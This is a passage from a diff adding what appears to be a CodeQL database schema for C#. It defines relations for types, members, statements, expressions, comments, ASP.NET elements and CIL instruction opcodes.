@field ref); + +attributes( + unique int id: @attribute, + int kind: int ref, + int type_id: @type_or_ref ref, + int target: @attributable ref); + +case @attribute.kind of + 0 = @attribute_default +| 1 = @attribute_return +| 2 = @attribute_assembly +| 3 = @attribute_module +; + +attribute_location( + int id: @attribute ref, + int loc: @location ref); + +@type_mention_parent = @element | @type_mention; + +type_mention( + unique int id: @type_mention, + int type_id: @type_or_ref ref, + int parent: @type_mention_parent ref); + +type_mention_location( + unique int id: @type_mention ref, + int loc: @location ref); + +@has_type_annotation = @assignable | @type_parameter | @callable | @expr | @delegate_type | @generic | @function_pointer_type; + +/** + * A direct annotation on an entity, for example `string? x;`. + * + * Annotations: + * 2 = reftype is not annotated "!" + * 3 = reftype is annotated "?" + * 4 = readonly ref type / in parameter + * 5 = ref type parameter, return or local variable + * 6 = out parameter + * + * Note that the annotation depends on the element it annotates. + * @assignable: The annotation is on the type of the assignable, for example the variable type. + * @type_parameter: The annotation is on the reftype constraint + * @callable: The annotation is on the return type + * @array_type: The annotation is on the element type + */ +type_annotation(int id: @has_type_annotation ref, int annotation: int ref); + +nullability(unique int nullability: @nullability, int kind: int ref); + +case @nullability.kind of + 0 = @oblivious +| 1 = @not_annotated +| 2 = @annotated +; + +#keyset[parent, index] +nullability_parent(int nullability: @nullability ref, int index: int ref, int parent: @nullability ref) + +type_nullability(int id: @has_type_annotation ref, int nullability: @nullability ref); + +/** + * The nullable flow state of an expression, as determined by Roslyn. + * 0 = none (default, not populated) + * 1 = not null + * 2 = maybe null + */ +expr_flowstate(unique int id: @expr ref, int state: int ref); + +/** GENERICS **/ + +@generic = @type | @method | @local_function; + +type_parameters( + unique int id: @type_parameter ref, + int index: int ref, + int generic_id: @generic ref, + int variance: int ref /* none = 0, out = 1, in = 2 */); + +#keyset[constructed_id, index] +type_arguments( + int id: @type_or_ref ref, + int index: int ref, + int constructed_id: @generic_or_ref ref); + +@generic_or_ref = @generic | @typeref; + +constructed_generic( + unique int constructed: @generic ref, + int generic: @generic_or_ref ref); + +type_parameter_constraints( + unique int id: @type_parameter_constraints, + int param_id: @type_parameter ref); + +type_parameter_constraints_location( + int id: @type_parameter_constraints ref, + int loc: @location ref); + +general_type_parameter_constraints( + int id: @type_parameter_constraints ref, + int kind: int ref /* class = 1, struct = 2, new = 3 */); + +specific_type_parameter_constraints( + int id: @type_parameter_constraints ref, + int base_id: @type_or_ref ref); + +specific_type_parameter_nullability( + int id: @type_parameter_constraints ref, + int base_id: @type_or_ref ref, + int nullability: @nullability ref); + +/** FUNCTION POINTERS */ + +function_pointer_calling_conventions( + int id: @function_pointer_type ref, + int kind: int ref); + +#keyset[id, index] +has_unmanaged_calling_conventions( + int id: @function_pointer_type ref, + int index: int ref, + int conv_id: @type_or_ref ref); + +/** MODIFIERS */ + +@modifiable = @modifiable_direct | @event_accessor; + +@modifiable_direct = @member | @accessor | @local_function | @anonymous_function_expr; + +modifiers( + unique int id: @modifier, + string name: string ref); + +has_modifiers( + int id: @modifiable_direct ref, + int mod_id: @modifier ref); + +compiler_generated(unique int id: @modifiable ref); + +/** MEMBERS **/ + +@member = @method | @constructor | @destructor | @field | @property | @event | @operator | @indexer | @type; + +@named_exprorstmt = @goto_stmt | @labeled_stmt | @expr; + +@virtualizable = @method | @property | @indexer | @event; + +exprorstmt_name( + unique int parent_id: @named_exprorstmt ref, + string name: string ref); + +nested_types( + unique int id: @type ref, + int declaring_type_id: @type ref, + int unbound_id: @type ref); + +properties( + unique int id: @property, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @property ref); + +property_location( + int id: @property ref, + int loc: @location ref); + +indexers( + unique int id: @indexer, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @indexer ref); + +indexer_location( + int id: @indexer ref, + int loc: @location ref); + +accessors( + unique int id: @accessor, + int kind: int ref, + string name: string ref, + int declaring_member_id: @member ref, + int unbound_id: @accessor ref); + +case @accessor.kind of + 1 = @getter +| 2 = @setter + ; + +init_only_accessors( + unique int id: @accessor ref); + +accessor_location( + int id: @accessor ref, + int loc: @location ref); + +events( + unique int id: @event, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @event ref); + +event_location( + int id: @event ref, + int loc: @location ref); + +event_accessors( + unique int id: @event_accessor, + int kind: int ref, + string name: string ref, + int declaring_event_id: @event ref, + int unbound_id: @event_accessor ref); + +case @event_accessor.kind of + 1 = @add_event_accessor +| 2 = @remove_event_accessor + ; + +event_accessor_location( + int id: @event_accessor ref, + int loc: @location ref); + +operators( + unique int id: @operator, + string name: string ref, + string symbol: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @operator ref); + +operator_location( + int id: @operator ref, + int loc: @location ref); + +constant_value( + int id: @variable ref, + string value: string ref); + +/** CALLABLES **/ + +@callable = @method | @constructor | @destructor | @operator | @callable_accessor | @anonymous_function_expr | @local_function; + +@callable_accessor = @accessor | @event_accessor; + +methods( + unique int id: @method, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @method ref); + +method_location( + int id: @method ref, + int loc: @location ref); + +constructors( + unique int id: @constructor, + string name: string ref, + int declaring_type_id: @type ref, + int unbound_id: @constructor ref); + +constructor_location( + int id: @constructor ref, + int loc: @location ref); + +destructors( + unique int id: @destructor, + string name: string ref, + int declaring_type_id: @type ref, + int unbound_id: @destructor ref); + +destructor_location( + int id: @destructor ref, + int loc: @location ref); + +overrides( + int id: @callable ref, + int base_id: @callable ref); + +explicitly_implements( + int id: @member ref, + int interface_id: @interface_or_ref ref); + +local_functions( + unique int id: @local_function, + string name: string ref, + int return_type: @type ref, + int unbound_id: @local_function ref); + +local_function_stmts( + unique int fn: @local_function_stmt ref, + int stmt: @local_function ref); + +/** VARIABLES **/ + +@variable = @local_scope_variable | @field; + +@local_scope_variable = @local_variable | @parameter; + +fields( + unique int id: @field, + int kind: int ref, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @field ref); + +case @field.kind of + 1 = @addressable_field +| 2 = @constant + ; + +field_location( + int id: @field ref, + int loc: @location ref); + +localvars( + unique int id: @local_variable, + int kind: int ref, + string name: string ref, + int implicitly_typed: int ref /* 0 = no, 1 = yes */, + int type_id: @type_or_ref ref, + int parent_id: @local_var_decl_expr ref); + +case @local_variable.kind of + 1 = @addressable_local_variable +| 2 = @local_constant +| 3 = @local_variable_ref + ; + +localvar_location( + unique int id: @local_variable ref, + int loc: @location ref); + +@parameterizable = @callable | @delegate_type | @indexer | @function_pointer_type; + +#keyset[name, parent_id] +#keyset[index, parent_id] +params( + unique int id: @parameter, + string name: string ref, + int type_id: @type_or_ref ref, + int index: int ref, + int mode: int ref, /* value = 0, ref = 1, out = 2, array = 3, this = 4 */ + int parent_id: @parameterizable ref, + int unbound_id: @parameter ref); + +param_location( + int id: @parameter ref, + int loc: @location ref); + +/** STATEMENTS **/ + +@exprorstmt_parent = @control_flow_element | @top_level_exprorstmt_parent; + +statements( + unique int id: @stmt, + int kind: int ref); + +#keyset[index, parent] +stmt_parent( + unique int stmt: @stmt ref, + int index: int ref, + int parent: @control_flow_element ref); + +@top_level_stmt_parent = @callable; + +// [index, parent] is not a keyset because the same parent may be compiled multiple times +stmt_parent_top_level( + unique int stmt: @stmt ref, + int index: int ref, + int parent: @top_level_stmt_parent ref); + +case @stmt.kind of + 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @switch_stmt +| 5 = @while_stmt +| 6 = @do_stmt +| 7 = @for_stmt +| 8 = @foreach_stmt +| 9 = @break_stmt +| 10 = @continue_stmt +| 11 = @goto_stmt +| 12 = @goto_case_stmt +| 13 = @goto_default_stmt +| 14 = @throw_stmt +| 15 = @return_stmt +| 16 = @yield_stmt +| 17 = @try_stmt +| 18 = @checked_stmt +| 19 = @unchecked_stmt +| 20 = @lock_stmt +| 21 = @using_block_stmt +| 22 = @var_decl_stmt +| 23 = @const_decl_stmt +| 24 = @empty_stmt +| 25 = @unsafe_stmt +| 26 = @fixed_stmt +| 27 = @label_stmt +| 28 = @catch +| 29 = @case_stmt +| 30 = @local_function_stmt +| 31 = @using_decl_stmt + ; + +@using_stmt = @using_block_stmt | @using_decl_stmt; + +@labeled_stmt = @label_stmt | @case; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @using_decl_stmt; + +@cond_stmt = @if_stmt | @switch_stmt; + +@loop_stmt = @while_stmt | @do_stmt | @for_stmt | @foreach_stmt; + +@jump_stmt = @break_stmt | @goto_any_stmt | @continue_stmt | @throw_stmt | @return_stmt + | @yield_stmt; + +@goto_any_stmt = @goto_default_stmt | @goto_case_stmt | @goto_stmt; + + +stmt_location( + unique int id: @stmt ref, + int loc: @location ref); + +catch_type( + unique int catch_id: @catch ref, + int type_id: @type_or_ref ref, + int kind: int ref /* explicit = 1, implicit = 2 */); + +foreach_stmt_info( + unique int id: @foreach_stmt ref, + int kind: int ref /* non-async = 1, async = 2 */); + +@foreach_symbol = @method | @property | @type_or_ref; + +#keyset[id, kind] +foreach_stmt_desugar( + int id: @foreach_stmt ref, + int symbol: @foreach_symbol ref, + int kind: int ref /* GetEnumeratorMethod = 1, CurrentProperty = 2, MoveNextMethod = 3, DisposeMethod = 4, ElementType = 5 */); + +/** EXPRESSIONS **/ + +expressions( + unique int id: @expr, + int kind: int ref, + int type_id: @type_or_ref ref); + +#keyset[index, parent] +expr_parent( + unique int expr: @expr ref, + int index: int ref, + int parent: @control_flow_element ref); + +@top_level_expr_parent = @attribute | @field | @property | @indexer | @parameter | @directive_if | @directive_elif; + +@top_level_exprorstmt_parent = @top_level_expr_parent | @top_level_stmt_parent; + +// [index, parent] is not a keyset because the same parent may be compiled multiple times +expr_parent_top_level( + unique int expr: @expr ref, + int index: int ref, + int parent: @top_level_exprorstmt_parent ref); + +case @expr.kind of +/* literal */ + 1 = @bool_literal_expr +| 2 = @char_literal_expr +| 3 = @decimal_literal_expr +| 4 = @int_literal_expr +| 5 = @long_literal_expr +| 6 = @uint_literal_expr +| 7 = @ulong_literal_expr +| 8 = @float_literal_expr +| 9 = @double_literal_expr +| 10 = @string_literal_expr +| 11 = @null_literal_expr +/* primary & unary */ +| 12 = @this_access_expr +| 13 = @base_access_expr +| 14 = @local_variable_access_expr +| 15 = @parameter_access_expr +| 16 = @field_access_expr +| 17 = @property_access_expr +| 18 = @method_access_expr +| 19 = @event_access_expr +| 20 = @indexer_access_expr +| 21 = @array_access_expr +| 22 = @type_access_expr +| 23 = @typeof_expr +| 24 = @method_invocation_expr +| 25 = @delegate_invocation_expr +| 26 = @operator_invocation_expr +| 27 = @cast_expr +| 28 = @object_creation_expr +| 29 = @explicit_delegate_creation_expr +| 30 = @implicit_delegate_creation_expr +| 31 = @array_creation_expr +| 32 = @default_expr +| 33 = @plus_expr +| 34 = @minus_expr +| 35 = @bit_not_expr +| 36 = @log_not_expr +| 37 = @post_incr_expr +| 38 = @post_decr_expr +| 39 = @pre_incr_expr +| 40 = @pre_decr_expr +/* multiplicative */ +| 41 = @mul_expr +| 42 = @div_expr +| 43 = @rem_expr +/* additive */ +| 44 = @add_expr +| 45 = @sub_expr +/* shift */ +| 46 = @lshift_expr +| 47 = @rshift_expr +/* relational */ +| 48 = @lt_expr +| 49 = @gt_expr +| 50 = @le_expr +| 51 = @ge_expr +/* equality */ +| 52 = @eq_expr +| 53 = @ne_expr +/* logical */ +| 54 = @bit_and_expr +| 55 = @bit_xor_expr +| 56 = @bit_or_expr +| 57 = @log_and_expr +| 58 = @log_or_expr +/* type testing */ +| 59 = @is_expr +| 60 = @as_expr +/* null coalescing */ +| 61 = @null_coalescing_expr +/* conditional */ +| 62 = @conditional_expr +/* assignment */ +| 63 = @simple_assign_expr +| 64 = @assign_add_expr +| 65 = @assign_sub_expr +| 66 = @assign_mul_expr +| 67 = @assign_div_expr +| 68 = @assign_rem_expr +| 69 = @assign_and_expr +| 70 = @assign_xor_expr +| 71 = @assign_or_expr +| 72 = @assign_lshift_expr +| 73 = @assign_rshift_expr +/* more */ +| 74 = @object_init_expr +| 75 = @collection_init_expr +| 76 = @array_init_expr +| 77 = @checked_expr +| 78 = @unchecked_expr +| 79 = @constructor_init_expr +| 80 = @add_event_expr +| 81 = @remove_event_expr +| 82 = @par_expr +| 83 = @local_var_decl_expr +| 84 = @lambda_expr +| 85 = @anonymous_method_expr +| 86 = @namespace_expr +/* dynamic */ +| 92 = @dynamic_element_access_expr +| 93 = @dynamic_member_access_expr +/* unsafe */ +| 100 = @pointer_indirection_expr +| 101 = @address_of_expr +| 102 = @sizeof_expr +/* async */ +| 103 = @await_expr +/* C# 6.0 */ +| 104 = @nameof_expr +| 105 = @interpolated_string_expr +| 106 = @unknown_expr +/* C# 7.0 */ +| 107 = @throw_expr +| 108 = @tuple_expr +| 109 = @local_function_invocation_expr +| 110 = @ref_expr +| 111 = @discard_expr +/* C# 8.0 */ +| 112 = @range_expr +| 113 = @index_expr +| 114 = @switch_expr +| 115 = @recursive_pattern_expr +| 116 = @property_pattern_expr +| 117 = @positional_pattern_expr +| 118 = @switch_case_expr +| 119 = @assign_coalesce_expr +| 120 = @suppress_nullable_warning_expr +| 121 = @namespace_access_expr +/* C# 9.0 */ +| 122 = @lt_pattern_expr +| 123 = @gt_pattern_expr +| 124 = @le_pattern_expr +| 125 = @ge_pattern_expr +| 126 = @not_pattern_expr +| 127 = @and_pattern_expr +| 128 = @or_pattern_expr +| 129 = @function_pointer_invocation_expr +| 130 = @with_expr +/* C# 11.0 */ +| 131 = @list_pattern_expr +| 132 = @slice_pattern_expr +/* Preprocessor */ +| 999 = @define_symbol_expr +; + +@switch = @switch_stmt | @switch_expr; +@case = @case_stmt | @switch_case_expr; +@pattern_match = @case | @is_expr; +@unary_pattern_expr = @not_pattern_expr; +@relational_pattern_expr = @gt_pattern_expr | @lt_pattern_expr | @ge_pattern_expr | @le_pattern_expr; +@binary_pattern_expr = @and_pattern_expr | @or_pattern_expr; + +@integer_literal_expr = @int_literal_expr | @long_literal_expr | @uint_literal_expr | @ulong_literal_expr; +@real_literal_expr = @float_literal_expr | @double_literal_expr | @decimal_literal_expr; +@literal_expr = @bool_literal_expr | @char_literal_expr | @integer_literal_expr | @real_literal_expr + | @string_literal_expr | @null_literal_expr; + +@assign_expr = @simple_assign_expr | @assign_op_expr | @local_var_decl_expr; +@assign_op_expr = @assign_arith_expr | @assign_bitwise_expr | @assign_event_expr | @assign_coalesce_expr; +@assign_event_expr = @add_event_expr | @remove_event_expr; + +@assign_arith_expr = @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr + | @assign_rem_expr +@assign_bitwise_expr = @assign_and_expr | @assign_or_expr | @assign_xor_expr + | @assign_lshift_expr | @assign_rshift_expr; + +@member_access_expr = @field_access_expr | @property_access_expr | @indexer_access_expr | @event_access_expr + | @method_access_expr | @type_access_expr | @dynamic_member_access_expr; +@access_expr = @member_access_expr | @this_access_expr | @base_access_expr | @assignable_access_expr | @namespace_access_expr; +@element_access_expr = @indexer_access_expr | @array_access_expr | @dynamic_element_access_expr; + +@local_variable_access = @local_variable_access_expr | @local_var_decl_expr; +@local_scope_variable_access_expr = @parameter_access_expr | @local_variable_access; +@variable_access_expr = @local_scope_variable_access_expr | @field_access_expr; + +@assignable_access_expr = @variable_access_expr | @property_access_expr | @element_access_expr + | @event_access_expr | @dynamic_member_access_expr; + +@objectorcollection_init_expr = @object_init_expr | @collection_init_expr; + +@delegate_creation_expr = @explicit_delegate_creation_expr | @implicit_delegate_creation_expr; + +@bin_arith_op_expr = @mul_expr | @div_expr | @rem_expr | @add_expr | @sub_expr; +@incr_op_expr = @pre_incr_expr | @post_incr_expr; +@decr_op_expr = @pre_decr_expr | @post_decr_expr; +@mut_op_expr = @incr_op_expr | @decr_op_expr; +@un_arith_op_expr = @plus_expr | @minus_expr | @mut_op_expr; +@arith_op_expr = @bin_arith_op_expr | @un_arith_op_expr; + +@ternary_log_op_expr = @conditional_expr; +@bin_log_op_expr = @log_and_expr | @log_or_expr | @null_coalescing_expr; +@un_log_op_expr = @log_not_expr; +@log_expr = @un_log_op_expr | @bin_log_op_expr | @ternary_log_op_expr; + +@bin_bit_op_expr = @bit_and_expr | @bit_or_expr | @bit_xor_expr | @lshift_expr + | @rshift_expr; +@un_bit_op_expr = @bit_not_expr; +@bit_expr = @un_bit_op_expr | @bin_bit_op_expr; + +@equality_op_expr = @eq_expr | @ne_expr; +@rel_op_expr = @gt_expr | @lt_expr| @ge_expr | @le_expr; +@comp_expr = @equality_op_expr | @rel_op_expr; + +@op_expr = @assign_expr | @un_op | @bin_op | @ternary_op; + +@ternary_op = @ternary_log_op_expr; +@bin_op = @bin_arith_op_expr | @bin_log_op_expr | @bin_bit_op_expr | @comp_expr; +@un_op = @un_arith_op_expr | @un_log_op_expr | @un_bit_op_expr | @sizeof_expr + | @pointer_indirection_expr | @address_of_expr; + +@anonymous_function_expr = @lambda_expr | @anonymous_method_expr; + +@call = @method_invocation_expr | @constructor_init_expr | @operator_invocation_expr + | @delegate_invocation_expr | @object_creation_expr | @call_access_expr + | @local_function_invocation_expr | @function_pointer_invocation_expr; + +@call_access_expr = @property_access_expr | @event_access_expr | @indexer_access_expr; + +@late_bindable_expr = @dynamic_element_access_expr | @dynamic_member_access_expr + | @object_creation_expr | @method_invocation_expr | @operator_invocation_expr; + +@throw_element = @throw_expr | @throw_stmt; + +@implicitly_typeable_object_creation_expr = @object_creation_expr | @explicit_delegate_creation_expr; + +implicitly_typed_array_creation( + unique int id: @array_creation_expr ref); + +explicitly_sized_array_creation( + unique int id: @array_creation_expr ref); + +stackalloc_array_creation( + unique int id: @array_creation_expr ref); + +implicitly_typed_object_creation( + unique int id: @implicitly_typeable_object_creation_expr ref); + +mutator_invocation_mode( + unique int id: @operator_invocation_expr ref, + int mode: int ref /* prefix = 1, postfix = 2*/); + +expr_compiler_generated( + unique int id: @expr ref); + +expr_value( + unique int id: @expr ref, + string value: string ref); + +expr_call( + unique int caller_id: @expr ref, + int target_id: @callable ref); + +expr_access( + unique int accesser_id: @access_expr ref, + int target_id: @accessible ref); + +@accessible = @method | @assignable | @local_function | @namespace; + +expr_location( + unique int id: @expr ref, + int loc: @location ref); + +dynamic_member_name( + unique int id: @late_bindable_expr ref, + string name: string ref); + +@qualifiable_expr = @member_access_expr + | @method_invocation_expr + | @element_access_expr; + +conditional_access( + unique int id: @qualifiable_expr ref); + +expr_argument( + unique int id: @expr ref, + int mode: int ref); + /* mode is the same as params: value = 0, ref = 1, out = 2 */ + +expr_argument_name( + unique int id: @expr ref, + string name: string ref); + +lambda_expr_return_type( + unique int id: @lambda_expr ref, + int type_id: @type_or_ref ref); + +/** CONTROL/DATA FLOW **/ + +@control_flow_element = @stmt | @expr; + +/* XML Files */ + +xmlEncoding ( + unique int id: @file ref, + string encoding: string ref); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; + +/* Comments */ + +commentline( + unique int id: @commentline, + int kind: int ref, + string text: string ref, + string rawtext: string ref); + +case @commentline.kind of + 0 = @singlelinecomment +| 1 = @xmldoccomment +| 2 = @multilinecomment; + +commentline_location( + unique int id: @commentline ref, + int loc: @location ref); + +commentblock( + unique int id : @commentblock); + +commentblock_location( + unique int id: @commentblock ref, + int loc: @location ref); + +commentblock_binding( + int id: @commentblock ref, + int entity: @element ref, + int bindtype: int ref); /* 0: Parent, 1: Best, 2: Before, 3: After */ + +commentblock_child( + int id: @commentblock ref, + int commentline: @commentline ref, + int index: int ref); + +/* ASP.NET */ + +case @asp_element.kind of + 0=@asp_close_tag +| 1=@asp_code +| 2=@asp_comment +| 3=@asp_data_binding +| 4=@asp_directive +| 5=@asp_open_tag +| 6=@asp_quoted_string +| 7=@asp_text +| 8=@asp_xml_directive; + +@asp_attribute = @asp_code | @asp_data_binding | @asp_quoted_string; + +asp_elements( + unique int id: @asp_element, + int kind: int ref, + int loc: @location ref); + +asp_comment_server(unique int comment: @asp_comment ref); +asp_code_inline(unique int code: @asp_code ref); +asp_directive_attribute( + int directive: @asp_directive ref, + int index: int ref, + string name: string ref, + int value: @asp_quoted_string ref); +asp_directive_name( + unique int directive: @asp_directive ref, + string name: string ref); +asp_element_body( + unique int element: @asp_element ref, + string body: string ref); +asp_tag_attribute( + int tag: @asp_open_tag ref, + int index: int ref, + string name: string ref, + int attribute: @asp_attribute ref); +asp_tag_name( + unique int tag: @asp_open_tag ref, + string name: string ref); +asp_tag_isempty(int tag: @asp_open_tag ref); + +/* Common Intermediate Language - CIL */ + +case @cil_instruction.opcode of + 0 = @cil_nop +| 1 = @cil_break +| 2 = @cil_ldarg_0 +| 3 = @cil_ldarg_1 +| 4 = @cil_ldarg_2 +| 5 = @cil_ldarg_3 +| 6 = @cil_ldloc_0 +| 7 = @cil_ldloc_1 +| 8 = @cil_ldloc_2 +| 9 = @cil_ldloc_3 +| 10 = @cil_stloc_0 +| 11 = @cil_stloc_1 +| 12 = @cil_stloc_2 +| 13 = @cil_stloc_3 +| 14 = @cil_ldarg_s +| 15 = @cil_ldarga_s +| 16 = @cil_starg_s +| 17 = @cil_ldloc_s +| 18 = @cil_ldloca_s +| 19 = @cil_stloc_s +| 20 = @cil_ldnull +| 21 = @cil_ldc_i4_m1 +| 22 = @cil_ldc_i4_0 +| 23 = @cil_ldc_i4_1 +| 24 = @cil_ldc_i4_2 +| 25 = @cil_ldc_i4_3 +| 26 = @cil_ldc_i4_4 +| 27 = @cil_ldc_i4_5 +| 28 = @cil_ldc_i4_6 +| 29 = @cil_ldc_i4_7 +| 30 = @cil_ldc_i4_8 +| 31 = @cil_ldc_i4_s +| 32 = @cil_ldc_i4 +| 33 = @cil_ldc_i8 +| 34 = @cil_ldc_r4 +| 35 = @cil_ldc_r8 +| 37 = @cil_dup +| 38 = @cil_pop +| 39 = @cil_jmp +| 40 = @cil_call +| 41 = @cil_calli +| 42 = @cil_ret +| 43 = @cil_br_s +| 44 = @cil_brfalse_s +| 45 = @cil_brtrue_s +| 46 = @cil_beq_s +| 47 = @cil_bge_s +| 48 = @cil_bgt_s +| 49 = @cil_ble_s +| 50 = @cil_blt_s +| 51 = @cil_bne_un_s +| 52 = @cil_bge_un_s +| 53 = @cil_bgt_un_s +| 54 = @cil_ble_un_s +| 55 = @cil_blt_un_s +| 56 = @cil_br +| 57 = @cil_brfalse +| 58 = @cil_brtrue +| 59 = @cil_beq +| 60 = @cil_bge +| 61 = @cil_bgt +| 62 = @cil_ble +| 63 = @cil_blt +| 64 = @cil_bne_un +| 65 = @cil_bge_un +| 66 = @cil_bgt_un +| 67 = @cil_ble_un +| 68 = @cil_blt_un +| 69 = @cil_switch +| 70 = @cil_ldind_i1 +| 71 = @cil_ldind_u1 +| 72 = @cil_ldind_i2 +| 73 = @cil_ldind_u2 +| 74 = @cil_ldind_i4 +| 75 = @cil_ldind_u4 +| 76 = @cil_ldind_i8 +| 77 = @cil_ldind_i +| 78 = @cil_ldind_r4 +| 79 = @cil_ldind_r8 +| 80 = @cil_ldind_ref +| 81 = @cil_stind_ref +| 82 = @cil_stind_i1 +| 83 = @cil_stind_i2 +| 84 = @cil_stind_i4 +| 85 = @cil_stind_i8 +| 86 = @cil_stind_r4 +| 87 = @cil_stind_r8 +| 88 = @cil_add +| 89 = @cil_sub +| 90 = @cil_mul +| 91 = @cil_div +| 92 = @cil_div_un +| 93 = @cil_rem +| 94 = @cil_rem_un +| 95 = @cil_and +| 96 = @cil_or +| 97 = @cil_xor +| 98 = @cil_shl +| 99 = @cil_shr +| 100 = @cil_shr_un +| 101 = @cil_neg +| 102 = @cil_not +| 103 = @cil_conv_i1 +| 104 = @cil_conv_i2 +| 105 = @cil_conv_i4 +| 106 = @cil_conv_i8 +| 107 = @cil_conv_r4 +| 108 = @cil_conv_r8 +| 109 = @cil_conv_u4 +| 110 = @cil_conv_u8 +| 111 = @cil_callvirt +| 112 = @cil_cpobj +| 113 = @cil_ldobj +| 114 = @cil_ldstr +| 115 = @cil_newobj +| 116 = @cil_castclass +| 117 = @cil_isinst +| 118 = @cil_conv_r_un +| 121 = @cil_unbox +| 122 = @cil_throw +| 123 = @cil_ldfld +| 124 = @cil_ldflda +| 125 = @cil_stfld +| 126 = @cil_ldsfld +| 127 = @cil_ldsflda +| 128 = @cil_stsfld +| 129 = @cil_stobj +| 130 = @cil_conv_ovf_i1_un +| 131 = @cil_conv_ovf_i2_un +| 132 = @cil_conv_ovf_i4_un +| 133 = @cil_conv_ovf_i8_un +| 134 = @cil_conv_ovf_u1_un +| 135 = @cil_conv_ovf_u2_un +| 136 = @cil_conv_ovf_u4_un +| 137 = @cil_conv_ovf_u8_un +| 138 = @cil_conv_ovf_i_un +| 139 = @cil_conv_ovf_u_un +| 140 = @cil_box +| 141 = @cil_newarr +| 142 = @cil_ldlen +| 143 = @cil_ldelema +| 144 = @cil_ldelem_i1 +| 145 = @cil_ldelem_u1 +| 146 = @cil_ldelem_i2 +| 147 = @cil_ldelem_u2 +| 148 = @cil_ldelem_i4 +| 149 = @cil_ldelem_u4 +| 150 = @cil_ldelem_i8 +| 151 = @cil_ldelem_i +| 152 = @cil_ldelem_r4 +| 153 = @cil_ldelem_r8 +| 154 = @cil_ldelem_ref +| 155 = @cil_stelem_i +| 156 = @cil_stelem_i1 +| 157 = @cil_stelem_i2 +| 158 = @cil_stelem_i4 +| 159 = @cil_stelem_i8 +| 160 = @cil_stelem_r4 +| 161 = @cil_stelem_r8 +| 162 = @cil_stelem_ref +| 163 = @cil_ldelem +| 164 = @cil_stelem +| 165 = @cil_unbox_any +| 179 = @cil_conv_ovf_i1 +| 180 = @cil_conv_ovf_u1 +| 181 = @cil_conv_ovf_i2 +| 182 = @cil_conv_ovf_u2 +| 183 = @cil_conv_ovf_i4 +| 184 = @cil_conv_ovf_u4 +| 185 = @cil_conv_ovf_i8 +| 186 = @cil_conv_ovf_u8 +| 194 = @cil_refanyval +| 195 = @cil_ckinfinite +| 198 = @cil_mkrefany +| 208 = @cil_ldtoken +| 209 = @cil_conv_u2 +| 210 = @cil_conv_u1 +| 211 = @cil_conv_i +| 212 = @cil_conv_ovf_i +| 213 = @cil_conv_ovf_u +| 214 = @cil_add_ovf +| 215 = @cil_add_ovf_un +| 216 = @cil_mul_ovf +| 217 = @cil_mul_ovf_un +| 218 = @cil_sub_ovf +| 219 = @cil_sub_ovf_un +| 220 = @cil_endfinally +| 221 = @cil_leave +| 222 = @cil_leave_s +| 223 = @cil_stind_i +| 224 = @cil_conv_u +| 65024 = @cil_arglist +| 65025 = @cil_ceq +| 65026 = @cil_cgt +| 65027 = @cil_cgt_un +| 65028 = @cil_clt +| 65029 = @cil_clt_un +| 65030 = @cil_ldftn +| 65031 = @cil_ldvirtftn +| 65033 = @cil_ldarg +| 65034 = @cil_ldarga +| 65035 = @cil_starg +| 65036 = @cil_ldloc +| 65037 = @cil_ldloca +| 65038 = @cil_stloc +| 65039 = @cil_localloc +| 65041 = @cil_endfilter +| 65042 = @cil_unaligned +| 65043 = @cil_volatile +| 65044 = @cil_tail +| 65045 = @cil_initobj +| 65046 = @cil_constrained +| 65047 = @cil_cpblk +| 65048 = @cil_initblk +| 65050 = @cil_rethrow +| 65052 = @cil_sizeof +| 65053 = @cil_refanytype +| 65054 = @cil_readonly +; + +// CIL ignored instructions + +@cil_ignore = @cil_nop | @cil_break | @cil_volatile | @cil_unaligned; + +// CIL local/parameter/field access + +@cil_ldarg_any = @cil_ldarg_0 | @cil_ldarg_1 | @cil_ldarg_2 | @cil_ldarg_3 | @cil_ldarg_s | @cil_ldarga_s | @cil_ldarg | @cil_ldarga; +@cil_starg_any = @cil_starg | @cil_starg_s; + +@cil_ldloc_any = @cil_ldloc_0 | @cil_ldloc_1 | @cil_ldloc_2 | @cil_ldloc_3 | @cil_ldloc_s | @cil_ldloca_s | @cil_ldloc | @cil_ldloca; +@cil_stloc_any = @cil_stloc_0 | @cil_stloc_1 | @cil_stloc_2 | @cil_stloc_3 | @cil_stloc_s | @cil_stloc; + +@cil_ldfld_any = @cil_ldfld | @cil_ldsfld | @cil_ldsflda | @cil_ldflda; +@cil_stfld_any = @cil_stfld | @cil_stsfld; + +@cil_local_access = @cil_stloc_any | @cil_ldloc_any; +@cil_arg_access = @cil_starg_any | @cil_ldarg_any; +@cil_read_access = @cil_ldloc_any | @cil_ldarg_any | @cil_ldfld_any; +@cil_write_access = @cil_stloc_any | @cil_starg_any | @cil_stfld_any; + +@cil_stack_access = @cil_local_access | @cil_arg_access; 